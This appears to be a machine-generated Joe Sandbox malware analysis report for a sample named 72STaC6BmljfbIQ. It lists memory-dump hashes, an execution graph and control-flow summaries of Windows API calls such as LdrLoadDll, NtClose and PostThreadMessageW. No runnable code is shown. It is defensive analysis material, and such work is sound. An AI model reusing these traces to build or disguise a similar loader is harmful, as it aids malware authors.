                                                                                                      • Instruction ID: 2e355e5112fbe7f9c9059e6a3fda8d36b619e0bc5ab9792d57768d74b775ab38
                                                                                                      • Opcode Fuzzy Hash: fcdc80419062b1f0612be5cddbd52667e740d12e065dfefece0a0f2537548e26
                                                                                                      • Instruction Fuzzy Hash: 5201F2710043489BE7144A25CDC0B66BBA9EF80726F28C51AEC4E4E282E3799840CBB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7facc041abb088260f6796a2ea4f342b941723a7a816a841e6b546c4565c7ef7
                                                                                                      • Instruction ID: a87874b615024702cec4cbebe8866dd8cad53983c4d0aca5914311e635f5e86f
                                                                                                      • Opcode Fuzzy Hash: 7facc041abb088260f6796a2ea4f342b941723a7a816a841e6b546c4565c7ef7
                                                                                                      • Instruction Fuzzy Hash: EBF0CD32004344AEE7148E16C984B62FFE8EF90735F28C55AED0D4E282D279AC44CAB1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 63625468587238ac90f371c502d477f7c1cc207d5dc0c3ae41d9d4395c384320
                                                                                                      • Instruction ID: 187cd59fd5f1239e10e63b8696dc2a2bb003a69c1e7ce4680f1579431f96c051
                                                                                                      • Opcode Fuzzy Hash: 63625468587238ac90f371c502d477f7c1cc207d5dc0c3ae41d9d4395c384320
                                                                                                      • Instruction Fuzzy Hash: 31D1DD30B003508FEF65DB75C850B6EBBF6AF89700F194569D556CBAA0CB35E801CB61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 21df31a5c142f73b328726bd70c45120acd2dcf508ceba48bc27ccf2a97f6e8f
                                                                                                      • Instruction ID: 83d63182579903d019d5b2d57c8e64c0ad409767d700c7176713f1c03e0cbe9f
                                                                                                      • Opcode Fuzzy Hash: 21df31a5c142f73b328726bd70c45120acd2dcf508ceba48bc27ccf2a97f6e8f
                                                                                                      • Instruction Fuzzy Hash: C41264F8501746EAD710CF66FA4C3893BA1FB85358BB0C309D2A15A2E5DBBD194ACF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 153f81aa53e93f4f7574a0851e4d247a04fbf11cf065f63350904c1783a83fc7
                                                                                                      • Instruction ID: b20d8309a5b2a1f6ed1ee02db05382b478943adc6882ad616baa8338e59d58ad
                                                                                                      • Opcode Fuzzy Hash: 153f81aa53e93f4f7574a0851e4d247a04fbf11cf065f63350904c1783a83fc7
                                                                                                      • Instruction Fuzzy Hash: 80E13A74E002598FDB14DFA9C681AAEFBF2FF89305F248169D815AB355C731A942CF60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9d4d12f152a08bc70c8b3ba96bc7473a5a840250c2991e5f645965a52f0d97a6
                                                                                                      • Instruction ID: fa8fe01dfc6f585597dce1d74e928df96aec3efed105b40da213cded7e0fd4b5
                                                                                                      • Opcode Fuzzy Hash: 9d4d12f152a08bc70c8b3ba96bc7473a5a840250c2991e5f645965a52f0d97a6
                                                                                                      • Instruction Fuzzy Hash: 07E13C74E002598FDB14DFA9C581AAEFBF2FF89305F248169D815A7355C730A942CFA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f7b575252d68ff739181da98bdd3c87e107f8de8f55af1435a214cfbec1efb0d
                                                                                                      • Instruction ID: 5aaa879c619cd5019a81aa8575c24af3660916b0316e2fdce0e8c01e11159684
                                                                                                      • Opcode Fuzzy Hash: f7b575252d68ff739181da98bdd3c87e107f8de8f55af1435a214cfbec1efb0d
                                                                                                      • Instruction Fuzzy Hash: C7E12A74E002598FDB14DFA8D581AAEFBF2FF89305F248169D815AB355D730A942CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: be8067e5b0010ce62991149ddb6af1a74e136b7757fe23fbc5bf0e8fc18d0762
                                                                                                      • Instruction ID: de8bdbe050a20cca0bea823d7ad1331df63e49fbea7af7733ae7df90c41f3e23
                                                                                                      • Opcode Fuzzy Hash: be8067e5b0010ce62991149ddb6af1a74e136b7757fe23fbc5bf0e8fc18d0762
                                                                                                      • Instruction Fuzzy Hash: B1E13D74E002598FDB14DFA8C581AAEFBF2FF89304F248159D815A7315D730A942CFA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 32428fdca4446d4216d58c59916ecba07af9d3fa9d1798666b6c24ed3376bbfb
                                                                                                      • Instruction ID: 5b6b54485b9efa4900d9030b22830f19aca7a71ae337d81b16421c3a004030f4
                                                                                                      • Opcode Fuzzy Hash: 32428fdca4446d4216d58c59916ecba07af9d3fa9d1798666b6c24ed3376bbfb
                                                                                                      • Instruction Fuzzy Hash: 1FE11774E002598FDB14DFA9C581AAEFBF2FF89305F258169D815AB315D730A942CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 51c68ad4c7d669dc23afd71419c10f5a758f209da0b62965d314aa8b02ca112d
                                                                                                      • Instruction ID: 22f12fccfca37f47d669a4886b5397baaa83db42ee72397e8f39a00ba90d4f1e
                                                                                                      • Opcode Fuzzy Hash: 51c68ad4c7d669dc23afd71419c10f5a758f209da0b62965d314aa8b02ca112d
                                                                                                      • Instruction Fuzzy Hash: A7D1D331D10B5A8ADB00EBA4D994699B7B1FFD5300F21C79AE5093B254FB70AAC4CF91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d72f9f50f497c690d42c071f7907739681a335d5c5f78e504d12cabc2c11124f
                                                                                                      • Instruction ID: 81b3baf64eb28e854401342fae5f648f007d801a83ee1841a7cb4556cb0a5deb
                                                                                                      • Opcode Fuzzy Hash: d72f9f50f497c690d42c071f7907739681a335d5c5f78e504d12cabc2c11124f
                                                                                                      • Instruction Fuzzy Hash: E0D1D331D10B5A8ADB00EBA4D994699B771FFD5300F21C79AE5093B254FB70AAC4CF91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a4fd7ff415be88f138d8f8b91d12592725f907e99971f3bbc74fdd9dab857c49
                                                                                                      • Instruction ID: b41cbacb8f53c41bf3383fd8ee48030973cabe8f6fcf186e89cb35a1b271b0b4
                                                                                                      • Opcode Fuzzy Hash: a4fd7ff415be88f138d8f8b91d12592725f907e99971f3bbc74fdd9dab857c49
                                                                                                      • Instruction Fuzzy Hash: ADA17B36E002158FCF16DFB5C9845AEB7B2FF85304B25856AE815AB265EB31E905CF80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1549023590.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4dc0000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 18a3310e1c535b06a5b8ad10ac8319c7e24ebd3fb7ab8fceba8911dc6a2552ab
                                                                                                      • Instruction ID: 23857103eaebe5ad733879d53f5e4520482a4037c83570db9e258941c208e35d
                                                                                                      • Opcode Fuzzy Hash: 18a3310e1c535b06a5b8ad10ac8319c7e24ebd3fb7ab8fceba8911dc6a2552ab
                                                                                                      • Instruction Fuzzy Hash: BEC1E7B9901746EFD710CF66FA482897BB1FB85324B708309D2616B2E1DBBD184ACF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9c68fdd1ef832e2b0a68064e2153f31dee989b88ecb51de5738960250da36e33
                                                                                                      • Instruction ID: 366527ca1565c6c0660ae3bec8a52cd8ccc20c79a13f4a1e166c069efae5768a
                                                                                                      • Opcode Fuzzy Hash: 9c68fdd1ef832e2b0a68064e2153f31dee989b88ecb51de5738960250da36e33
                                                                                                      • Instruction Fuzzy Hash: 29515C70E042598FDB14CFA9C5815ADFBF2BF89204F25C1AAD818AB316D7319942CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9b2832a3dc0d024821193ff2d8393cce109f9dafc4931b81d71ab480e5a19735
                                                                                                      • Instruction ID: 01f32d5377ab9b085b63e9ce413f7ec60eb980ced14379bdd28f20fd5e350e49
                                                                                                      • Opcode Fuzzy Hash: 9b2832a3dc0d024821193ff2d8393cce109f9dafc4931b81d71ab480e5a19735
                                                                                                      • Instruction Fuzzy Hash: D5511A70E042598FDB14CFA9D5816AEFBF2FF89304F24816AD818A7715D7349942CFA1

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.3%
                                                                                                      Dynamic/Decrypted Code Coverage:5.3%
                                                                                                      Signature Coverage:8.3%
                                                                                                      Total number of Nodes:132
                                                                                                      Total number of Limit Nodes:10
                                                                                                      execution_graph 90048 4019c0 90049 4019d2 90048->90049 90052 42fd43 90049->90052 90055 42e383 90052->90055 90056 42e3a9 90055->90056 90067 407233 90056->90067 90058 42e3bf 90059 401a51 90058->90059 90070 41b143 90058->90070 90061 42e3de 90062 42e3f3 90061->90062 90085 42cad3 90061->90085 90081 428353 90062->90081 90065 42e40d 90066 42cad3 ExitProcess 90065->90066 90066->90059 90088 4164e3 90067->90088 90069 407240 90069->90058 90071 41b16f 90070->90071 90112 41b033 90071->90112 90074 41b1b4 90077 41b1d0 90074->90077 90079 42c743 NtClose 90074->90079 90075 41b19c 90076 41b1a7 90075->90076 90118 42c743 90075->90118 90076->90061 90077->90061 90080 41b1c6 90079->90080 90080->90061 90082 4283b5 90081->90082 90084 4283c2 90082->90084 90126 418673 90082->90126 90084->90065 90086 42caed 90085->90086 90087 42cafe ExitProcess 90086->90087 90087->90062 90089 4164fd 90088->90089 90091 416513 90089->90091 90092 42d173 90089->90092 90091->90069 90094 42d18d 90092->90094 90093 42d1bc 90093->90091 90094->90093 90099 42bdf3 90094->90099 90100 42be0d 90099->90100 90106 11c2c0a 90100->90106 90101 42be36 90103 42e7d3 90101->90103 90109 42ca93 90103->90109 90105 42d232 90105->90091 90107 11c2c1f LdrInitializeThunk 90106->90107 90108 11c2c11 90106->90108 90107->90101 90108->90101 90110 42caad 90109->90110 90111 42cabb RtlFreeHeap 90110->90111 90111->90105 90113 41b129 90112->90113 90114 41b04d 90112->90114 90113->90074 90113->90075 90121 42be83 90114->90121 90117 42c743 NtClose 90117->90113 90119 42c75d 90118->90119 90120 42c76b NtClose 90119->90120 90120->90076 90122 42be9d 90121->90122 90125 11c35c0 LdrInitializeThunk 90122->90125 90123 41b11d 90123->90117 90125->90123 90128 41869d 90126->90128 90127 418bab 90127->90084 90128->90127 90134 413cf3 90128->90134 90130 4187ca 90130->90127 90131 42e7d3 RtlFreeHeap 90130->90131 90132 4187e2 90131->90132 90132->90127 90133 42cad3 ExitProcess 90132->90133 90133->90127 90138 413d13 90134->90138 90136 413d7c 90136->90130 90137 413d72 90137->90130 90138->90136 90139 41b453 RtlFreeHeap LdrInitializeThunk 90138->90139 90139->90137 90140 424e23 90145 424e3c 90140->90145 90141 424ecf 90142 424e87 90143 42e7d3 RtlFreeHeap 90142->90143 90144 424e97 90143->90144 90145->90141 90145->90142 90146 424eca 90145->90146 90147 42e7d3 RtlFreeHeap 90146->90147 90147->90141 90148 42bda3 90149 42bdbd 90148->90149 90152 11c2df0 LdrInitializeThunk 90149->90152 90150 42bde2 90152->90150 90174 42f873 90175 42f883 90174->90175 90176 42f889 90174->90176 90177 42e8b3 RtlAllocateHeap 90176->90177 90178 42f8af 90177->90178 90179 424a93 90180 424aaf 90179->90180 90181 424ad7 90180->90181 90182 424aeb 90180->90182 90183 42c743 NtClose 90181->90183 90184 42c743 NtClose 90182->90184 90185 424ae0 90183->90185 90186 424af4 90184->90186 90189 42e8f3 RtlAllocateHeap 90186->90189 90188 424aff 90189->90188 90153 41e543 90154 41e569 90153->90154 90158 41e666 90154->90158 90159 42f9a3 90154->90159 90156 41e604 90157 42bdf3 LdrInitializeThunk 90156->90157 90156->90158 90157->90158 90160 42f913 90159->90160 90161 42f970 90160->90161 90165 42e8b3 90160->90165 90161->90156 90163 42f94d 90164 42e7d3 RtlFreeHeap 90163->90164 90164->90161 90168 42ca53 90165->90168 90167 42e8ce 90167->90163 90169 42ca6d 90168->90169 90170 42ca7b RtlAllocateHeap 90169->90170 90170->90167 90190 413b13 90193 42c9c3 90190->90193 90194 42c9dd 90193->90194 90197 11c2c70 LdrInitializeThunk 90194->90197 90195 413b35 90197->90195 90198 41b333 90199 41b377 90198->90199 90200 41b398 90199->90200 90201 42c743 NtClose 90199->90201 90201->90200 90202 414119 90203 4140a6 90202->90203 90205 414122 90202->90205 90206 4140ba 90203->90206 90209 417813 90203->90209 90207 414106 90206->90207 90208 4140f3 PostThreadMessageW 90206->90208 90208->90207 90210 417837 90209->90210 90211 417873 LdrLoadDll 90210->90211 90212 41783e 90210->90212 90211->90212 90212->90206 90171 418dc8 90172 42c743 NtClose 90171->90172 90173 418dd2 90172->90173 90213 11c2b60 LdrInitializeThunk

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 517 417813-41783c call 42f3b3 520 417842-417850 call 42f9b3 517->520 521 41783e-417841 517->521 524 417860-417871 call 42de53 520->524 525 417852-41785d call 42fc53 520->525 530 417873-417887 LdrLoadDll 524->530 531 41788a-41788d 524->531 525->524 530->531
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417885
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                                      • Instruction ID: 05a5680942dabe8a321efdcf2b6f82430579c081dca23c65dcb556c1d755013b
                                                                                                      • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                                      • Instruction Fuzzy Hash: 8A0152B1E4010DB7DB10EAA1DC42FDEB3789B14308F4081A6E90897240F674EB48CB95

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 537 42c743-42c779 call 404583 call 42d943 NtClose
                                                                                                      APIs
                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C774
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                                      • Instruction ID: 9e0658677882e74928744a82f9e72dba2eb639633bc470e9b9a98b36903aceda
                                                                                                      • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                                      • Instruction Fuzzy Hash: 63E04F752002147BC610EA5AEC41E9B775CDFC5724F004419FA48A7241CA75BA11C6A4
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
                                                                                                      • Instruction ID: 1fa837aa741d1e1e33eae37a04eb7f571862644d69e7d78882d37966da9d2894
                                                                                                      • Opcode Fuzzy Hash: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
                                                                                                      • Instruction Fuzzy Hash: 5690026520241003410971584514616401A97E0201B55C021E1015590DC62589916226
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
                                                                                                      • Instruction ID: 10f5023dafbd75a6c93424c35efb9070117c1a3715903d67ebfa6f485c7db155
                                                                                                      • Opcode Fuzzy Hash: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
                                                                                                      • Instruction Fuzzy Hash: 3F90023520141413D11571584604707001997D0241F95C412E0425558DD7568A52A222
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
                                                                                                      • Instruction ID: d41869fc8749cd7b5704d2e3bca042a7fc5061ce87a51b42991f201e683db864
                                                                                                      • Opcode Fuzzy Hash: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
                                                                                                      • Instruction Fuzzy Hash: DD90023520149802D1147158850474A001597D0301F59C411E4425658DC79589917222
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
                                                                                                      • Instruction ID: d2937d0265d4de630469f33fbf60ff095eb1325efff43d668267c2e8bbe913b3
                                                                                                      • Opcode Fuzzy Hash: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
                                                                                                      • Instruction Fuzzy Hash: 4090023560551402D10471584614706101597D0201F65C411E0425568DC7958A5166A3

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 132 414119-414120 133 414122-414129 132->133 134 4140a6-4140b4 132->134 137 41412b-41412f 133->137 135 4140ba-4140f1 call 4044f3 call 424f53 134->135 136 4140b5 call 417813 134->136 149 414113-414118 135->149 150 4140f3-414104 PostThreadMessageW 135->150 136->135 139 414131-414136 137->139 140 41414d-414153 137->140 139->140 142 414138-41413d 139->142 140->137 143 414155-414158 140->143 142->140 145 41413f-414146 142->145 147 414159-41415c 145->147 148 414148-41414b 145->148 148->140 148->147 150->149 151 414106-414110 150->151 151->149
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                                                                      • Instruction ID: 26a48773d49b5d4830db5d6a3abe6c0441e01ffa8e7dd764610f6d3443abad5e
                                                                                                      • Opcode Fuzzy Hash: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                                                                      • Instruction Fuzzy Hash: F5117B31D0024879EB309E708C05FEF6B654BD2764F48829AFE14AB3D2D77949C28788

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 152 41406f-414070 153 414072-41407a 152->153 154 41408f-4140f1 call 42e873 call 42f283 call 417813 call 4044f3 call 424f53 152->154 165 414113-414118 154->165 166 4140f3-414104 PostThreadMessageW 154->166 166->165 167 414106-414110 166->167 167->165
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                                                                      • Instruction ID: 0f7a8f7452082f141b53ab21a3766a0a1486675bc0825100db931c7ccd50f644
                                                                                                      • Opcode Fuzzy Hash: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                                                                      • Instruction Fuzzy Hash: BA01DF32E4521876E7209791AC02FDEB7689F81B14F40815AFF147B381D6795A0247D9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 168 41407c-414093 170 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 168->170 171 414097 call 42e873 168->171 180 414113-414118 170->180 181 4140f3-414104 PostThreadMessageW 170->181 171->170 181->180 182 414106-414110 181->182 182->180
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                                                                      • Instruction ID: 087d0fd33435a02eb29b34bb39c81c2954cd161ddf22aaec2d78f1b904196256
                                                                                                      • Opcode Fuzzy Hash: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                                                                      • Instruction Fuzzy Hash: 9E112F31E40218B6EB2197E18C02FDF7B7C8F81B44F408069FA047B2C1D7B85A0687E5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 183 414083-414093 184 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 183->184 185 414097 call 42e873 183->185 194 414113-414118 184->194 195 4140f3-414104 PostThreadMessageW 184->195 185->184 195->194 196 414106-414110 195->196 196->194
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
